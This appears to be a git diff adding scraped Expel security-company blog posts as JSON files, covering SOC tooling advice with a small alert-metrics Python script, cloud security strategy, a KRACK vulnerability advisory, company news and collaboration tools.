Security operations centers (SOCs) are rife with inadequate, poorly integrated, dated technology that seems to frustrate security practitioners even if it\u2019s functional most of the time. Is there a SIEM sitting around whose care and feeding stopped a few years ago and seems to deliver little but false positives anymore? Did you pick an endpoint detection and response (EDR) solution that truly was \u201c the new hotness \u201d three years ago only now to discover that there\u2019s another \u201c new new hotness \u201d in town? Or my current favorite: state of the art network packet capture devices monitoring links that have no visibility into sensitive data moving between third-party cloud providers. If you\u2019ve hired well, these problems give rise to something interesting: intrepid security analysts spinning Python to work around limitations of existing technology and streamlining what they can. Does this help? Amazingly, it sure does. Being close to the problems and the associated technology means your analysts have unique insight into how to make their lives better. Go figure. The drawback? They\u2019re not software engineers. The solutions are brittle and difficult to maintain across churn. Are we at an impasse then? Are we destined to be working with sub-optimal technology that does little more than confound us and get in our way? Well, yes and no. Here are seven things to keep in mind to bring harmony to your toolchain. 1. There are no perfect tools Regardless of what you end up buying to solve your [insert security capability here] gap, the tool you choose will fall short in some way. Optimize for the capabilities that are most important to you and fill the gap another way. 2. Your imperfect tools need care and feeding Negligence degrades your tools\u2019 performance. Maintaining operational rigor around maintenance is important, as is throwing out old tools when they\u2019ve passed their prime. 3. Track capabilities Whether you\u2019re talking about detection capability on the network, investigation capability on the endpoint, or vice-versa, keep an inventory of what tools are allegedly solving which problems. Avoid buying new tools just because it\u2019s fun. 4. Evaluate visibility Beyond the capabilities your tools provide, each has a certain scope. Your EDR solution\u2019s visibility is governed by where agents are installed. Your packet sniffers can only see the links they\u2019re plugged into. Your security analysts are already in an unfair fight: make sure they\u2019re not fighting with blinders on. 5. Measure efficacy You have assumptions when you buy new security products. Do your detectors detect with a good signal-to-noise ratio? Are your investigative tools used frequently? Track not only frequency of use, but how you\u2019re getting faster over time. 6. Integrate Using imperfect tools is bad enough, hopping between frustrating consoles is worse. Encourage your security analysts to build software (ok, ok, write code) to mitigate alt-tab-copy-paste-death. To really turn it up to 11 , invest in professional SOC plumbers (experienced software engineers) who understand the operational realities. 7. \u201cEquipment and material\u201d is more than tools While we\u2019ve focused heavily on tool choice in this post, operationalizing your tools is actually more important than their selection. Part of that is documentation. Playbooks. Without these, getting value out of your security investments depends on tribal knowledge, which is easily lost. 
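To make #5 concrete: you don\u2019t need a metrics platform to start measuring. A small script over an export of closed alerts (a minimal sketch, with made-up file and column names) is enough to show which detections are earning their keep:

import csv
from collections import defaultdict

# Assumes an export of closed alerts with at least these columns:
#   tool, disposition  (where disposition is true_positive or false_positive)
counts = defaultdict(lambda: defaultdict(int))

with open('closed_alerts.csv', newline='') as handle:
    for row in csv.DictReader(handle):
        counts[row['tool']][row['disposition']] += 1

for tool, dispositions in sorted(counts.items()):
    total = sum(dispositions.values())
    signal = dispositions['true_positive'] / total if total else 0.0
    print(f'{tool}: {total} alerts, {signal:.0%} true positives')

Run it monthly and the trend tells you which tools to tune, which to retire and where analyst time is actually going.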
\u2014 There are always clever new variations on old themes when it comes to security risks. Heck, some variations aren\u2019t even that clever or that new \u2026 but manage to ruin your day anyway. So, your security apparatus can\u2019t be static either. Looking for a place to start? Once you get to the \u201cacceptance\u201d phase for #1 above, evaluate how well your existing tools are being maintained and address those gaps first. Work down the list from there. As you press forward with this journey, realize that change will be constant. Optimizing for this along the way will help ensure your security toolset adapts to your changing needs. Your security analysts will thank you for it. This is the first part of a five part series on key areas of focus to improve security team retention. Read the introduction, 5 ways to keep your security nerds happy , or continue to part two ." +} \ No newline at end of file diff --git a/getting-a-grip-on-your-cloud-security-strategy.json b/getting-a-grip-on-your-cloud-security-strategy.json new file mode 100644 index 0000000000000000000000000000000000000000..b38bb3c70aa9bbd3075987e85c08c964a0abda51 --- /dev/null +++ b/getting-a-grip-on-your-cloud-security-strategy.json @@ -0,0 +1,6 @@ +{ + "title": "Getting a grip on your cloud security strategy", + "url": "https://expel.com/blog/getting-a-grip-on-your-cloud-security-strategy/", + "date": "Oct 9, 2018", + "contents": "Subscribe \u00d7 EXPEL BLOG Getting a grip on your cloud security strategy Security operations \u00b7 7 MIN READ \u00b7 JEN BIELSKI \u00b7 OCT 9, 2018 \u00b7 TAGS: Cloud security / How to / Overview / Planning Add up all of those selfies, food photos and iCloud backups and it\u2019s no surprise that consumer cloud usage has increased 50% in the past five years. Companies are hot on their tail. In the past seven years, the number of organizations with at least one application or a portion of their infrastructure in the cloud has increased from 51% to 73% . Ready or not, the cloud is here. But what does that mean for security? What\u2019s old is new (again) It\u2019s Groundhog Day! Or maybe Groundhog Decade? Cloud security today looks a lot like where \u201ctraditional\u201d on-prem security was 10 or 15 years ago. Most people are just starting to think through how they\u2019re going to build a security program around this new perimeter. For most, that starts with figuring out where their data is (\u2026 especially their sensitive data). Unfortunately, we can\u2019t just rinse and repeat what we did 15 years ago. While some things are the same, more has changed. User accounts are the new endpoints. Attackers can compromise your data without coming anywhere near your network. They just need to compromise a single user account. That\u2019s a lot less work than popping a box, moving laterally and performing reconnaissance before they steal the data. It also means your focus needs to expand from \u201cwhere are my endpoints\u201d to \u201cwhat are my users doing?\u201d Questions like \u201care my users logging in from places I don\u2019t expect them to?\u201d and \u201cdoes this user have permission to access sensitive data\u201d will uncover a lot more evildoers than looking for malware. Those front-row seats now come with an obstructed view. You can\u2019t point to the box that has your \u201ccrown jewels\u201d anymore. In fact, you\u2019re no longer in full control of the walls that are protecting your data. 
That limited visibility means you\u2019ve got to try a little harder to see the things that were once right in front of you. Speaking of control, it\u2019s important to understand where the responsibility line is. What will your cloud vendor do vs. what do you need to care about? You need some new plays \u2026 and probably a whole new playbook. Coming up with a cloud security strategy is a little like playing a new game while the rules are being written. What\u2019s OK for employees to do and thus what security needs to care about is in flux. For example, employees can upload and share a document in minutes with applications like Box, Dropbox and OneDrive. That\u2019s convenient, but it also makes it easy for copies of your sensitive data to fly away. When it comes to the infrastructure, IT teams can \u201cflip the switch\u201d and spin up a new server or storage bucket. Policies to mitigate these new risks are playing catch-up and security is often left in the position of highlighting \u201cweird stuff\u201d that\u2019s going on so that someone can do something about it. Getting a grip on your cloud security strategy It\u2019s easy to try to push a round peg (traditional security) into a square hole (cloud security). It\u2019s what you know and it\u2019s routine. Plus, finding the time to focus on strategy can be hard. Understanding how to think about cloud security differently is half the battle. At Expel, we\u2019ve thought a lot about it, and we\u2019ve identified three key points that should inform your cloud strategy. 1. It\u2019s part of your risk profile It can be unsettling when you ship your data to the cloud. It\u2019s easy to fall into the trap of assuming that just because you shipped it to a big-name vendor like Microsoft or Google that \u201cthey\u2019ve got security covered.\u201d If your data lives in the cloud then it\u2019s part of your perimeter. And if it\u2019s part of your perimeter, then it\u2019s another home on your plot of land to protect. That means you\u2019ve got to include it in your risk profile. In the good old days, you could put a firewall around it and feel reasonably secure. But you can\u2019t put a traditional firewall around cloud applications like G Suite and O365. So you\u2019ll need a strategy to mitigate the risk. The nice thing is that your cloud providers are responsible for things like infrastructure and networking. But in order to assess your risk, one of the key things you need to understand is where their responsibilities end and yours begin. Of course, you\u2019re responsible for what you put in the cloud, including your applications and data. But what else? Failing to understand where that line is can create holes in your risk profile and leave the gate open for an attacker (or employee) to steal or misuse sensitive documents. 2. It requires special focus It may be tempting to just take the logs from your cloud infrastructure and apps, send it to your SIEM and stir. Unfortunately, that won\u2019t get you very far. Why? The data you need to look at and the questions you need to ask are different. As I mentioned above, users are the new endpoints. So\u2026instead of looking for unusual endpoint behavior, a security analyst needs to look for unusual user behavior. And once they detect suspicious activity, they need to look for clues under rocks they haven\u2019t turned over before \u2013 like AWS CloudTrail or O365 audit logs. Here\u2019s a quick example that illustrates what I\u2019m talking about. 
Shortly after onboarding a customer we detected a phishing attempt in their O365 environment. The phishing email came from a legitimate user. But once we dug deeper into the audit logs we discovered the attacker had changed a mailbox rule to evade detection and then sent out hundreds of emails without anyone noticing. This discovery allowed us to develop a new rule to detect similar activity in the future. The detection, investigation and future preventive steps were all unique to the cloud (and in some cases, unique to O365). That\u2019s what we mean by special focus. 3. Cloud security has multiple parts When it comes to the cloud, it\u2019s not a monolith. It\u2019s more like triplets. There are different parts to think about. They\u2019re all vying for your attention and you need to think about them differently. If you only focus on one \u2013 such as securing your cloud apps \u2013 you may be leaving the door to your cloud infrastructure unlocked for an attacker to walk right through. At Expel, we break cloud security into three different parts: cloud applications like O365, cloud infrastructure (aka \u201cservers in the sky\u201d) and highly elastic cloud infrastructure where you\u2019re auto scaling your servers based on load. Breaking cloud security into three parts Cloud applications Cloud infrastructure Elastic infrastructure Sample applications Office 365 Salesforce Okta AWS Azure Google Cloud AWS AutoScale Kubernetes What they are Software programs that are hosted in the cloud. If you log in to a website to use it, that\u2019s a cloud app. If you install it on your own hard drive, it\u2019s not. A collection of servers, containers and virtual machines that are hosted by a third party. We call them \u201cservers in the sky.\u201d Basically, if your servers aren\u2019t running in your own data center (or closet) you\u2019re probably using cloud infrastructure. An environment where you\u2019re rapidly provisioning and de-provisioning servers and other resources based on spikes in end user demand. What\u2019s special about them You\u2019ve got less control and visibility over what users are doing and what data about their activity is available. You\u2019ve got less visibility into what\u2019s happening and how the infrastructure might get compromised. You need to understand how your applications behave and have visibility into what they\u2019re doing at any point in time. Detection questions to ask If a user logs in from Los Angeles and three hours later logs in from Beijing, is this physically possible? Are your S3 buckets configured correctly? Did a user just upload sensitive data that is visible to the world? Are any of your servers reaching outside of your network? Each of these three approaches is so special that we\u2019ll be publishing a separate blog post on each of them to dive into the details (so subscribe to our blog! ). But for now, it\u2019s important to note that you need to approach each of these three parts of \u201cthe cloud\u201d differently than you treat your on-prem data and apps. So \u2026 where do you start? If you\u2019re reading this and saying to yourself \u201cthat all sounds nice, but how do I get started?\u201d you\u2019re not alone. In fact, you\u2019re in good company. Here are a few ideas to help point you in the right direction: Inventory your cloud apps (and risk). Things like Office 365, Workday, Salesforce and ServiceNow are the obvious place to start. But chances are, there are dozens of different cloud apps in use across your company. 
Make a list and then rank them by risk. How bad would it be if an account were compromised or data was stolen from the app? Catalog all of your sensitive data (no matter where it is). With the march to the cloud all of your sensitive data probably isn\u2019t where you think it is. So go find it \u2026 even if you\u2019ve got to send out a search party. Figure out what cloud security data you\u2019ve got. Chances are, you can use a lot of the investments you already have. So map the signals you get from your existing security tech against the risks you\u2019ve identified. Do you have the right logs for things like user authentication? Data access? Where do those logs go and can you get alerts from them? Can you perform historical queries? Put some basic controls in place. If you\u2019ve completed the previous two steps you\u2019ll have a good grasp on what your cloud-informed risk profile looks like. And there are some basic things you can put in place even while you\u2019re working on your broader cloud security strategy. For example, put identity management controls in place. Limit access to tasks like spinning up an S3 bucket in Amazon. Make sure that people who have admin access need it. And lock down login permissions by, for example, blocking logins from unusual IP locations. Implement two-factor authentication. This is a no-brainer and yet it\u2019s amazing how many organizations don\u2019t do it. If your cloud apps offer two-factor authentication, make it mandatory. Period. Invest in training. As we\u2019ve mentioned before, learning is fundamental . The cloud is a new frontier and securing your apps and data that live there requires new skills. Get your team closer to your developers. And, if you have some, send them to a conference or a class. Allocate time and budget for them to play around with cloud-specific tech. Finally, if you\u2019re looking to increase understanding across your organization of the need to beef up your approach to cloud security it might be useful to run an incident response tabletop exercise. There\u2019s nothing like running through a real-life scenario to identify gaps, improve workflows and highlight areas that need new investment that can make you better prepared for when an incident does occur. And if you\u2019re having trouble getting people to attend, you might consider turning it into a game . Of course, if you come to the conclusion you need someone to monitor your cloud apps and infrastructure, we\u2019re always happy to help :-)." +} \ No newline at end of file diff --git a/good-news-in-unusual-times-cybersecurity-company.json b/good-news-in-unusual-times-cybersecurity-company.json new file mode 100644 index 0000000000000000000000000000000000000000..eff7854130284abc1b8b9b713afbcc2eaa84d30d --- /dev/null +++ b/good-news-in-unusual-times-cybersecurity-company.json @@ -0,0 +1,6 @@ +{ + "title": "Good news in unusual times - Cybersecurity Company ...", + "url": "https://expel.com/blog/good-news-in-unusual-times/", + "date": "May 13, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG Good news in unusual times Expel insider \u00b7 3 MIN READ \u00b7 DAVE MERKEL, YANEK KORFF AND JUSTIN BAJKO \u00b7 MAY 13, 2020 \u00b7 TAGS: Announcement / Company news / Managed security You\u2019re probably expecting a pithy introduction to this blog post. And under normal circumstances, we\u2019d have one waiting for you. However, that tongue-in-cheek intro doesn\u2019t feel right given what\u2019s happening in our world right now. 
Which is why today we\u2019re going to cut straight to the heart of what we want to share. We\u2019re incredibly grateful and humbled to tell you that we\u2019ve raised a new round of funding. This time, our $50 Million Series D financing was led by CapitalG , Alphabet\u2019s independent growth fund, with participation from many of our existing investors : Battery Ventures, Greycroft, Index Ventures, Paladin Capital Group and Scale Venture Partners. We\u2019re thankful that we get to continue on our journey to change the face of managed security \u2013 taking great care of our customers and our own crew along the way. And while we\u2019re celebrating this news because it\u2019s good for the businesses we help protect every day and the employees who\u2019ve joined us on this journey, celebrating while there\u2019s an incredible amount of uncertainty in the world feels a bit uncomfortable. It\u2019s not lost on us how fortunate we are. Our hope is that with this new round of funding, we can continue to serve our customers (and add new ones to the Expel family) to the best of our abilities, making space for them to do more than chase alerts \u2026 at a time when they need that flexibility the most. Making space for teams to do what they love about security When we founded Expel nearly four years ago, we set out to provide our customers with greater peace of mind about security \u2013 whether they\u2019re operating \u201cbusiness as usual\u201d or facing more challenging circumstances. Our team had some initial core beliefs about the state of managed security that inspired us to build something different, and our customers have helped us confirm those beliefs: They want a security partner who\u2019ll give them answers to solve their most pressing security challenges, not just toss them a handful of alerts and say, \u201cYou should really look into those.\u201d They want a tech-first approach to security, ideally where they can get value right away from the tools they already own versus being told to go buy new ones (we love the \u201cBYO tech\u201d approach too). More than anything, they want to get better and keep their companies secure, all while maintaining their own sanity and their team\u2019s \u2026 because anyone who has worked in security for any length of time knows that stress and burnout are very real. During initial conversations about what we wanted the Expel brand to be \u2013 years ago when we were all gathered around a table in Merk\u2019s barn \u2013 we tossed around this idea of \u201cmaking space\u201d for our customers to do what they love about security. Since then, we\u2019ve been thankful to hear directly from our customers about how we\u2019ve supported them in \u201cmaking space.\u201d One of the more gratifying comments came from the CISO at a high-growth tech company who recently told us this: \u201cI get 8+ hours of sleep a night and my child recognizes me as their father again thanks to Expel.\u201d There couldn\u2019t be a better time than now to help our customers make space, whether it\u2019s to work on more strategic security priorities for their business, support loved ones or care for their own health. The road ahead We know that so many are facing difficult times right now. We\u2019re optimistic, though, that the light at the end of the tunnel will ultimately be bright. We\u2019re incredibly grateful for this new round of funding, and look forward to continuing to serve our customers and take care of our own crew of Expletives. 
Thank you to everyone who\u2019s supported us on this journey so far: our employees, customers, partners, investors, family and friends. If there\u2019s one thing all of us wholeheartedly agree on, it\u2019s that we\u2019re privileged to work alongside such incredible people every day. It\u2019s times like these that make us really appreciate that." +} \ No newline at end of file diff --git a/got-workloads-in-microsoft-azure-read-this.json b/got-workloads-in-microsoft-azure-read-this.json new file mode 100644 index 0000000000000000000000000000000000000000..febe1f6af862da117c336884411642b37df27197 --- /dev/null +++ b/got-workloads-in-microsoft-azure-read-this.json @@ -0,0 +1,6 @@ +{ + "title": "Got workloads in Microsoft Azure? Read this", + "url": "https://expel.com/blog/workloads-in-microsoft-azure/", + "date": "Jan 19, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG Got workloads in Microsoft Azure? Read this Security operations \u00b7 1 MIN READ \u00b7 PETER SILBERMAN, MATTHEW KRACHT AND MICHAEL BARCLAY \u00b7 JAN 19, 2021 \u00b7 TAGS: Cloud security / MDR / Tech tools Anyone who performs detection and response in the cloud knows that figuring out how to get the right signal for analysts to efficiently do their job is \u2026 challenging. Running workloads in Microsoft Azure is no exception. But once you get your head around what signals you should turn on and how you can use that data, alert and log data available natively in Azure can be a powerful tool to help you keep attackers out of your environment. Our guidebook will help you get started on building your Azure detection and response strategy, not to mention figure out the difference between the numerous sources of security signal in Azure. Download our brand new Azure guidebook: Building a detection and response strategy , where we\u2019ll talk about: The available sources of logging and alert data in Azure; How to categorize each Azure Defender Service and understand what they do; Fields that Expel found most useful in triaging anomalous alerts; and A few of the lessons we\u2019ve learned setting up Azure security signal (Hint: You can use these to inform and tweak your own security monitoring activities!). We\u2019ll walk you through the types of signal and logging sources that are available in Azure, share guidance on what signal you should consider turning on so your analysts get the information they need (and aren\u2019t bogged down with information they don\u2019t need), along with some considerations we\u2019ve identified as we built out our own Azure detection and response strategy. Sound helpful? We hope so! Download your copy now" +} \ No newline at end of file diff --git a/grab-your-sneaks-we-re-gearing-up-to-support-a-walk-for-a.json b/grab-your-sneaks-we-re-gearing-up-to-support-a-walk-for-a.json new file mode 100644 index 0000000000000000000000000000000000000000..2bbdba4cb91cfcfbe4fdece5446e707911330499 --- /dev/null +++ b/grab-your-sneaks-we-re-gearing-up-to-support-a-walk-for-a.json @@ -0,0 +1,6 @@ +{ + "title": "Grab your sneaks: we're gearing up to support a walk for a ...", + "url": "https://expel.com/blog/grab-your-sneaks-were-gearing-up-to-support-a-walk-for-a-cause/", + "date": "Oct 19, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Grab your sneaks: we\u2019re gearing up to support a walk for a cause Expel insider \u00b7 1 MIN READ \u00b7 CANDICE BRISTOW \u00b7 OCT 19, 2022 \u00b7 TAGS: Company news At Expel, we love October. Coffee flavors are better. 
We get to celebrate Cybersecurity Awareness Month . Halloween! And it\u2019s time for the annual Skechers Pier to Pier Friendship Walk . This event brings thousands together in California for a walk from Manhattan Beach Pier to Hermosa Beach Pier, and back, culminating in a day of celebrations. Co-produced by the Skechers Foundation and the Friendship Foundation , the walk raises money in support of children with disabilities and their families, and also to support public education and a national college scholarship program\u2014funding one-on-one peer mentoring and social recreational activities, including summer camps, sporting events, cooking classes, music lessons, and more. Expel is a proud \u201cdigital swag\u201d sponsor of this year\u2019s walk. We\u2019re always thrilled to see our customers involved in initiatives that reflect our own values, and we\u2019re so excited by the chance to support Skechers in this cause. The idea that we\u2019re \u201cbetter when different\u201d is a core value at Expel. Since the beginning, we\u2019ve worked hard to build an inclusive and welcoming place where people can do great work and where every person feels they can show up authentically. Our goal is to create a space for people to do what they love while strengthening our company regardless of race, gender, age, disability status, or any aspect of their identity or role. We\u2019re a stronger organization when we recognize, celebrate, and learn from those whose backgrounds and perspectives are different from our own. We believe that actively nurturing a culture of equity, inclusivity, and belonging is essential for our success, and we support those working with a broader spectrum of diversity, including these efforts by Skechers and the Friendship Foundation. On October 30, our own Jenn Karlsson (hey, Jenn ) will be at the Manhattan Beach Pier to join in on the fun. Follow along on social media ( @expel_io , @skechersp2pwalk , and @thefriendshipfoundation ) for pics from the day and to learn more about how you can participate in this life-changing initiative." +} \ No newline at end of file diff --git a/head-and-business-in-the-uk-cloud-s-we-can-help.json b/head-and-business-in-the-uk-cloud-s-we-can-help.json new file mode 100644 index 0000000000000000000000000000000000000000..7459643b02e8c9f8e17f1fa011cee7e442a985a3 --- /dev/null +++ b/head-and-business-in-the-uk-cloud-s-we-can-help.json @@ -0,0 +1,6 @@ +{ + "title": "Head\u2014and business\u2014in the UK cloud(s)? We can help.", + "url": "https://expel.com/blog/head-and-business-in-the-uk-clouds-we-can-help/", + "date": "Mar 6, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG Head\u2014and business\u2014in the UK cloud(s)? We can help. Expel insider \u00b7 2 MIN READ \u00b7 CHRIS WAYNFORTH \u00b7 MAR 6, 2023 \u00b7 TAGS: Company news Expel is making its UK trade show debut at the Cloud & Cyber Security Expo , 8th \u2013 9th March, and we\u2019re absolutely buzzing about it\u2014to say the least. Why? Glad you asked. Aside from the chance to grab a pint with our peers in the security space, we\u2019re looking forward to talking shop on all things cloud, because that\u2019s a language we speak fluently. In fact, our cloud detections are specific to Google Cloud Platform (GCP), Google Kubernetes Engine (GKE), Microsoft Azure, Amazon Web Services (AWS), and Amazon Elastic Kubernetes Engine (EKS). 
This means we can quickly detect and remediate the risks you\u2019d otherwise miss, whether attacks originate in the cloud, Kubernetes (k8s), SaaS apps, or even on-prem. We give the answers and outcomes you need to secure your cloud accurately and quickly. (Did we mention 98% of Expel\u2019s detections originated from a detection written by Expel?) Sidebar: If you\u2019re reading closely (we sure hope that you are), you might have noticed we mentioned Kubernetes. That\u2019s a pretty big deal for us\u2014or really any managed detection and response (MDR) provider\u2014because we just launched the general availability of Expel MDR for Kubernetes, the first-to-market offering of its kind. Learn all about it, including whether it\u2019s right for your org, here . Now, where were we\u2026 Right! Cloud security might be kind of our gig, but it certainly doesn\u2019t stop there. We help orgs of all shapes and sizes manage business risk. We use our technology, people, and expertise to provide businesses with security that makes sense. Expel Workbench\u2122, our security operations platform, lets us deliver clear answers and prescriptive advice to help your security team proactively identify and remediate vulnerabilities and threats\u2014and do it with a mean time to remediation (MTTR) of 22 minutes. Our managed security products transparently thwart attackers and breaches, giving you confidence that your business is secure, your security investments are working, and your teams are focused on business priorities\u2014not alerts. While you\u2019re at the Expo, swing by stand S-22 to meet our UK crew and schedule a demo if you want to see all this in action. We\u2019ll also send you home with a summary of our annual threat report, Great eXpeltations . It\u2019s brimming with cybersecurity trends and predictions, right from our security operations centre (SOC), and full of insights and data you can use. By the way, if you\u2019re around on March 8, join us for a drink at the Good Hotel from 4pm to wind down from the day. Details and how to RSVP here \u2026 See you there . Cheers!" +} \ No newline at end of file diff --git a/heads-up-wpa2-vulnerability.json b/heads-up-wpa2-vulnerability.json new file mode 100644 index 0000000000000000000000000000000000000000..4ff194cea4eefd221fc978a96890bdf7572b2c5d --- /dev/null +++ b/heads-up-wpa2-vulnerability.json @@ -0,0 +1,6 @@ +{ + "title": "Heads up: WPA2 vulnerability", + "url": "https://expel.com/blog/heads-wpa2-vulnerability/", + "date": "Oct 16, 2017", + "contents": "Subscribe \u00d7 EXPEL BLOG Heads up: WPA2 vulnerability Tips \u00b7 1 MIN READ \u00b7 BRUCE POTTER \u00b7 OCT 16, 2017 \u00b7 TAGS: Alert / Heads up / Vulnerability Re: the WPA2 vulnerability. Details here: https://www.krackattacks.com . The TL;DR is \u201cdon\u2019t flip out.\u201d This is an example of bug marketing and the infosec echo chamber getting way out in front of reality. Important bits There are multiple vulnerabilities. They all generally revolve around data decryption, injection, or replay. Attacks must be carried out on individual clients at a time. The attack does NOT affect all clients at once. Like any wireless attack, the attacker needs to be in relatively close proximity to execute. This VASTLY limits the attack surface as it\u2019s more costly and risky for an attacker to execute than traditional network-borne attacks. Traffic that is otherwise protected is fine (TLS for example). 
The author makes some broad claims that TLS sessions aren\u2019t secure b/c there are other attacks against TLS. That\u2019s an over generalization. The story is different for local protocols that lack strong encryption. Vendors have known about this attack since August. Microsoft has already patched and others have as well. You can track progress here . Ultimately, these vulnerabilities are mostly of concern to organizations that are targets of well resourced, highly motivated attackers since attackers have to be close to targets, actively injecting traffic, and then they would have to use that access to exploit some other system in order to gain access. Most organizations do not fall into that category and should patch this vulnerability in their normal patching cycles. No need to go crazy addressing this announcement. You likely have far more pressing matters that will impact the security of your organization more than worrying about KRACK. One takeaway from this vulnerability is the importance of the security of higher level protocols. TLS and VPNs run over wireless networks insulate your endpoints from compromises of the network infrastructure. Consider focusing your energies on ensuring your wireless networks run resilient layer 3+ protocols to protect from layer 2 shenanigans." +} \ No newline at end of file diff --git a/help-us-make-a-wish-come-true.json b/help-us-make-a-wish-come-true.json new file mode 100644 index 0000000000000000000000000000000000000000..0d1ac90dafe2dee31b4a18b962ffe3952991910c --- /dev/null +++ b/help-us-make-a-wish-come-true.json @@ -0,0 +1,6 @@ +{ + "title": "Help us make a wish come true", + "url": "https://expel.com/blog/help-us-make-a-wish-come-true/", + "date": "Apr 24, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG Help us make a wish come true Expel insider \u00b7 1 MIN READ \u00b7 KAITLIN RICKETTS \u00b7 APR 24, 2023 \u00b7 TAGS: Company news We\u2019re pretty proud to count Make-A-Wish among our customers. In addition to the fantastic work they do in the U.S., they (and 30,000 volunteers) now grant wishes internationally in 50 countries on six continents through 40 affiliates. All told, they\u2019ve granted more than 550,000 wishes for children with critical illnesses worldwide since 1980. Every day, more than 35 wishes, on average, are granted throughout the U.S. and its territories. That\u2019s incredible. Now, let\u2019s make it even better. Expel is planning to make a donation to Make-A-Wish on World Wish Day, April 29. You can brighten a few more faces by sharing your story through a review on G2 by April 28. For each customer review received, we\u2019ll make a contribution to our donation goal of $10,000. (BTW, reviews are anonymous, and please, be 100% honest . Not only will you help us reach our goal, but your comments can inform decisions your peers in other organizations are making. And anonymous third-party insight is gold to us.) Expel works to actively nurture a culture of equity, inclusivity and belonging in everything we do. This means creating a safe place where everyone feels they\u2019re valued and that they belong. Everyone should be treated with kindness, and not many organizations do this better than Make-A-Wish. We\u2019re committed to helping them do even more, and we hope you\u2019ll help us reach our goal." 
+} \ No newline at end of file diff --git a/helpful-tools-for-technical-teams-to-collaborate-without.json b/helpful-tools-for-technical-teams-to-collaborate-without.json new file mode 100644 index 0000000000000000000000000000000000000000..492f0858e3cf9ca5c2721cd27d20af084f35666f --- /dev/null +++ b/helpful-tools-for-technical-teams-to-collaborate-without.json @@ -0,0 +1,6 @@ +{ + "title": "Helpful tools for technical teams to collaborate without ...", + "url": "https://expel.com/blog/helpful-tools-technical-teams/", + "date": "Mar 15, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Helpful tools for technical teams to collaborate without meetings Tips \u00b7 5 MIN READ \u00b7 PETER SILBERMAN \u00b7 MAR 15, 2022 \u00b7 TAGS: Tech tools The first week of March was Expel\u2019s quarterly Week Without Meetings (or WWOM \u2014 you can read about it here ). It\u2019s an experiment we ran in 2020 that\u2019s become a quarterly event we all look forward to. We ask everyone to cancel every internal meeting possible and encourage our team to use these weeks to work on projects they\u2019ve had to put to the side, do something for their professional development, and take time to focus on their well-being. The goal: be more intentional about the meetings we do schedule afterwards. Does that conversation really need a meeting? Or can we connect asynchronously over Slack or work together in a Google doc? As CTO, I find these weeks incredibly valuable. Even if I still have a few important conversations scheduled during my WWOM, removing all of our recurring meetings is a huge reprieve and allows for deep thought work time, catching up with other humans (yay), and a general change of pace. This past WWOM, as my team carried on working together without jumping on Zoom, I reflected on the tools and tricks we now use to reduce the burden of meetings on an ongoing basis while still communicating and collaborating across our team and org. Hopefully there\u2019s something here that can help with your team\u2019s \u201cmeeting mojo,\u201d as we like to call it, and create more time and space for your people and the work that excites them. Disclaimer: While Expel is a customer of several of the vendors I\u2019ll list here, we\u2019re in no way sponsored or being asked to write about them. These are genuinely tools I\u2019d want to use wherever I\u2019m working. Asynchronous feedback and collaboration One of the challenges with meetings, besides scheduling, is the imposition of asking people to bring their A game at a time you choose, or at a time that fits into most people\u2019s schedules. This is especially important when you\u2019re seeking collaboration \u2014 whether discussing feedback or brainstorming. I find those two types of asks carry a heavy cognitive load. If you\u2019re a morning person like me, your preference is likely to do that kind of work in the AM. If you aren\u2019t like me, you may prefer the late afternoon, which is when I\u2019m desperately in need of another coffee. Either way, the timing of specific types of meetings can have an impact on the capabilities people bring to the table. I\u2019ve found that offering asynchronous collaboration instead is an effective way to involve everyone you need at their own ideal time. To that end, Google docs are a great tool for async feedback and brainstorming. I know, truly novel, right? This probably isn\u2019t a surprise to many. But I want to talk about a common mistake I see made when collaborating on content. 
Project owners often don\u2019t anticipate that, with so many messages and docs swirling around, those coming into a shared doc may have forgotten the initial ask or may not recall the role they play in the ask. Are they bringing a customer perspective, editing for grammar, or thinking about how other teams will react? I\u2019ve found the easiest way to help with this is to start the doc with what you expect or need from reviewers and a reminder of how the content will be used. Here\u2019s a screenshot of a Google doc where I did just this: Key details for asynchronous collaboration in Google docs These details help each reviewer know where and how to focus their time and energy so they can provide the most useful feedback and prevent duplicative efforts. Asynchronous feedback and socialization The video tool Loom is one of my new favorite tools to combat meetings. Our team\u2019s using it in two ways. The first is perhaps more obvious \u2014 it\u2019s a great way to asynchronously socialize a concept, provide training, or present on a new topic. For example, our Principal Data Scientist Elisabeth Weber recorded two Loom videos called \u201cLearn to Rank,\u201d explaining how we use ranking at Expel. These videos can be watched by our team as they see fit at a good time for each of them to consume the concept. Loom also has metrics on how many people watched a video, and those watching can see comments left by previous viewers. This becomes really powerful when you present a concept that connects dots across multiple teams. Expel Learn to Rank Loom presentation video The second way we\u2019ve started to use Loom is for asynchronous feedback on presentation talk tracks. As someone who regularly has to present ideas to diverse audiences, I\u2019m constantly seeking feedback from different parts of the company to make sure I have a concise, complete, and compelling message while also avoiding any \u201cgotchas\u201d I may have missed. Loom is an amazing tool to use in the draft phase of presentation building. Recording talk tracks with slides and getting feedback from colleagues who can record their responses has been invaluable for building impactful presentations that get the right message across. Below is a screenshot of the most recent video I recorded \u2014 all of those talk bubbles are what we would call constructive feedback, and those emojis are what some would call trolling. Suffice it to say, I saved a lot of time by getting this feedback, deleting this presentation, and starting over \ud83d\ude42 Loom presentation feedback Socializing research outcomes When completing research, you can often be left wondering, \u201cHow do I start moving this through the larger org outside of my (research) team?\u201d There are different factors for success ( note to self: this could be a whole blog series, especially on what not to do from personal experience\u2026 ), but one of them is generating awareness and interest among other teams. Researchers know that doing the research is only half of the work \u2014 the other half is communicating, recommunicating, and moving the findings through your org. At Expel, we love Jupyter Notebooks for this. Specifically, structuring Notebooks to socialize completed research has helped us more easily translate that research into product features. We usually use slides in combination with a Notebook. Slides help us set the stage for why we did the research, remind everyone of our goals, discuss solutions and potential impacts, gotchas, etc. 
